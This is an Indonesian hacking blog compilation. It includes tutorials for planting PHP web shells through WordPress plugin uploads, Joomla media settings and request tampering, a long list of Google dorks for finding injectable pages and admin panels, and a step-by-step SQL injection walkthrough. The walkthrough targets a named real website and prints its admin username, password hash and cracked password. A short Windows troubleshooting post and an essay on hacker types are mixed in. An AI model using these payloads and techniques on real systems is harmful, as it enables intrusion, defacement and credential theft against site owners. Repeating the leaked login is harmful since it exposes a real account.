Friday, June 28, 2013

Upload Shell dengan Tamper data

http://jimbojw.com/wiki/images/7/7d/Tamper-data-ongoing-results.png 



Tutor lama nih hehe...cuma mau mellengkapi aja...
kadang kalo kita udah masuk ke admin web sk bingung mau ngapain...
kl mau upload shell langsung aja siapkan bahannya..

1.shell.php <<< contoh ( silahkan cari d google, yg saya pake shell b374k.php)
2.add ons tamper data.. KLIK BAGI YANG BELUM PUNYA 
kl udah kita mulai...
pertama rubah extensi shell anda, contoh shell.php menjadi shell.php.jpg...
kedua cari tempat untuk upload shell kita, seperti di tempat upload gambar, kalo sudah ketemu browse/masukan shell.php.jpg anda..
jangan klik upload dulu, buka tamper data,klik Start tamper baru klik upload
nanti akan ada notice yg keluar, klik tamper, Liat di tamper sebelah kanan disitu kita cari nama shell kita, contoh shell.php.jpg
hapus .jpg nya lalu klik OK...jika sudah selesai dan berhasil terupload close aja tamper datanya...
untuk membuka shell kita, coba cari di halaman mana shell kita upload..jika sudah ketemu klik kanan - view image info, cari disitu..
selesai...


Sumber : http://www.jakengnewbie.net/2011/12/tutor-lama-nih-hehe.html#ixzz1gWhppnyX

Cara Menanam Shell Melalui Upload Plugin | Wordpress

Assalamualaikum
kali ini saya akan menjelaskan bagaimana cara menanam shell melalui upload plugin di wp
langsung saja ya:

Kita disini membutuhkan suatu plugin, anggap aja akismet, lalu kita rubah nama foldernya.
Contoh yang udah jadi => Download

1. Masukan shell ke dalam folder tersebut
2. Pergi ke Plugins > Add New > Upload. lalu pilih .zip yang tadi di download lalu tekan tombol "Install Now !"

3. Cuekin saja kalau Error seperti gambar dibawah ini.

4. Akses di 
http://localhost.com/wp-content/plugins/namafolder/namashell.php


Note : tutorial ini diperuntukan jika tempat editor [theme editor dan plugin editor] di proteksi atau untuk alternatif jika tidak mengganti script web samasekali.
Sumber :  207 Cyber Security

Cara Mudah Upload Shell (Backdoor) di Web Joomla

Kali ini saya akan share cara mudah upload shell di web CMS Joomla. kadang kita masih bingung saat menemukan web Joomla namun tidak tahu cara upload shell. Oleh karena itu kali ini saya akan berbagi trik upload shell di Joomla.
Step 1 :
Oke, saya anggap kalian sudah login ke Web Joomla. Klik Global Configuration.
Lihat Gambar :



Step 2:
Lalu klik bagian System :
Perhatikan sub bagian dibawahnya :
Legal Extensions (File Types) : tambahkan ekstensi php
Restrict Uploads : pilih NO
Check MIME Types : pilih NO
Legal Image Extensions (File Types) : tambahkan ekstensi php
Legal MIME Types : tambahkan image/php


Lalu klik save

Step 3:
Klik menu Media Manager
Upload Shell disitu.


Step 4 :
Sekarang kita panggil shellnya.
Lokasiya di http://[site]/images/[shell.php]
Sekarang terserah anda mau diapain tuh situs. Mau dideface terserah. :p
Sekian tutorial kali ini. Semoga bermanfaat.

sumber: http://www.madura-cyber.org/

Sunday, February 3, 2013

Cara Mengatasi Masalah Documents.library-ms is no longer working

Pernah nggak mengalami kasus seperti ini :

"<libraryname>.library-ms is no longer working"

Contohnya Seperti ini :

"Documents.library-ms is no longer working"

This library can be safely deleted from your computer. Folders that have been included will not be affected.




Atau Seperti ini :

"Music.library-ms" is no longer working.
"Pictures.library-ms" is no longer working.
"Videos.library-ms" is no longer working.

Hemm.. Pasti menyebalkan yah... padahal Document- document penting kita simpan di situ... Hadewww...
Gua juga baru aja mengalaminya nih.. cepcepecp
Terus "Bagaimana Si Mengatasi Hal Tersebut?" 

Berikut Langkah - Langkah "Cara Mengatasi Masalah Documents.library-ms is no longer working" :

1. Buka Windows Explorer



2. Cllick kanan pada Library yang error dan Click Delete! ( Ya Delete Library tersebut! Tenang Walaupun di delete data anda yanga da di dalam Library tersebut masih tetap aman kok :) ).


3. Seteleh di Delete Sekarang Click kanan menu Library yang ada di Panel Navigasi Windows Explorer dan Click Restore Default Library Seperti ini :



Selesai, Library yang tadinya Error kini berfungsi kembali,



Begitulah "Cara Mengatasi Masalah Documents.library-ms is no longer working" Mudah Bukan :)

Wednesday, December 19, 2012

Dork Lengkap Untuk SQLi Havij SQL Helper Dll

Hello teman-teman seperjuangan, sebelumnya kita perkenalan dulu ya. Nama saya Ahmad Farhan Fauzan biasa dipanggil Farhan. Oke, kalau ada hal yang perlu di tanyakan komentar saja atau chat yang ada di bawah jika saya online.
ok lansung saja ke intinya.




 [+] Tools
 [-] Google atau bisa juga dengan SQL Injection Scanner [for scan vuln site]

inurl:/general.php?*id=*
inurl:/careers-detail.asp?id=
inurl:/WhatNew.asp?page=&id=
inurl:/gallery.asp?cid=
inurl:/publications.asp?type=
inurl:/mpfn=pdview&id=
inurl:/reservations.php?id=
inurl:/list_blogs.php?sort_mode=
inurl:/eventdetails.php?*=
inurl:/commodities.php?*id=
inurl:/recipe-view.php?id=
inurl:product.php?mid=
inurl:view_ad.php?id=
inurl:/imprimir.php?id=
inurl:/prodotti.php?id=
inurl:index.cgi?aktion=shopview
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/*.php?id=
inurl:/articles.php?id=
inurl:/os_view_full.php?
inurl:/Content.asp?id=
inurl:/CollectionContent.asp?id=
inurl:/Details.asp?id=
intext:"Powered By : SE Software Technologies" filetype:php
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/dosearch.asp?
inurl:/details.php?linkid=
inurl:/viewfaqs.php?cat=
inurl:/calendar.php?token=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
allinurl:*.php?txtCodiInfo=
inurl:/notizia.php?idArt=
inurl:read.php?=
inurl:"ViewerFrame?Mode="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -
intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail " IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" " IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"

Saturday, December 15, 2012

Deface Web Dengan Cara SQL Injection

Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.




Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
dork nya bisa di klik di sini

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘”di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8–kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad &catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi &data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION”“SELECT”dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-”sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-”didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1”dengan  “@@version”untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)”dan juga ditambahkan “+ from+information_schema.schemata–”sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)”dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())”dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()”diantara nomor awal dan “–”hapus juga tanda “+”dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name”ke “column_name”dan “information_schema.tables”ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname”dengan kolom yang anda mau ambil informasinta. “0x3a”akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename”dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username &database
Credit: Madun &Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
1
2
3
4
5
6
7
8
http://www.cocobod.gh/news_details.php?id=30 order by 1-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- &gt;&gt; no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- &gt;&gt; Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--</strong>





Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

1
<strong>http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--</strong>



Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–

Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:

Code:
1
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
1
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:


comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)


Sumber: http://www.binushacker.net

Membedakan Hacker,Cracker,Defacer,Phreaker,Hacker Wannabe,Script kiddies,Scammer, dan Newbie

Untuk bahan iseng saja karena saya lagi muak… kebetulan heran saja kenapa semakin banyak manusia aneh di blog ini yang kurang mengetahui pengetahuan umum tentang dasar-dasar komputer, pemrograman dasar, jaringan tingkat tinggi dan lainnya, tapi ingin sekali di beri julukan “hacker”? untuk pengakuan diri? ataukah cuma sekedar ego sesaat untuk mendapatkan support/dukungan? biar terlihat keren? biar di segani kawan dan lawan?
Sebenarnya kalau ditanya arti hacker itu apa sih? pasti jawaban umumnya adalah orang hebat yang menguasai komputer bla bla bla… tanpa di sadari perbedaan dan harfiah yang sebenarnya semakin lama semakin hilang tenggelam dan akhirnya muncullah para newbie yang memberi label pada diri mereka sendiri dengan label “hacker” abal-abal.
Hacking adalah sebuah seni ketrampilan mengoperasikan/mengendalikan/menguasai komputer mencakup semua aspek mulai dari level dasar sampai level tertinggi baik dalam komputerisasi dasar, pemrograman dasar sampai dengan jaringan yang sangat rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”. Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan  mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system… Jadi kalau ada yang teriak “HAI SAYA INI HACKER” apakah dia memang masuk kategori hacker ataukah malah masuk kategori lain-nya yang lebih spesifik?
Cracker? Cracker bisa di kategorikan sebagai orang yang memahami jenis pemrograman tingkat tinggi dan sedikit pengetahuan jaringan. UMUM-nya cracker kebanyakan membuat kemampuan untuk membuah sebuah program untuk meng-disfungsikan/me-manipulasi jalur yang seharusnya. Contohnya: Cracker membuat sebuah program agar program yang seharusnya berbayar menjadi gratis. Cracker tidak terlalu memahami seluk beluk jaringan mereka kebanyakan umum-nya cenderung menyukai segala sesuatu yang bersifat GRATISAN.
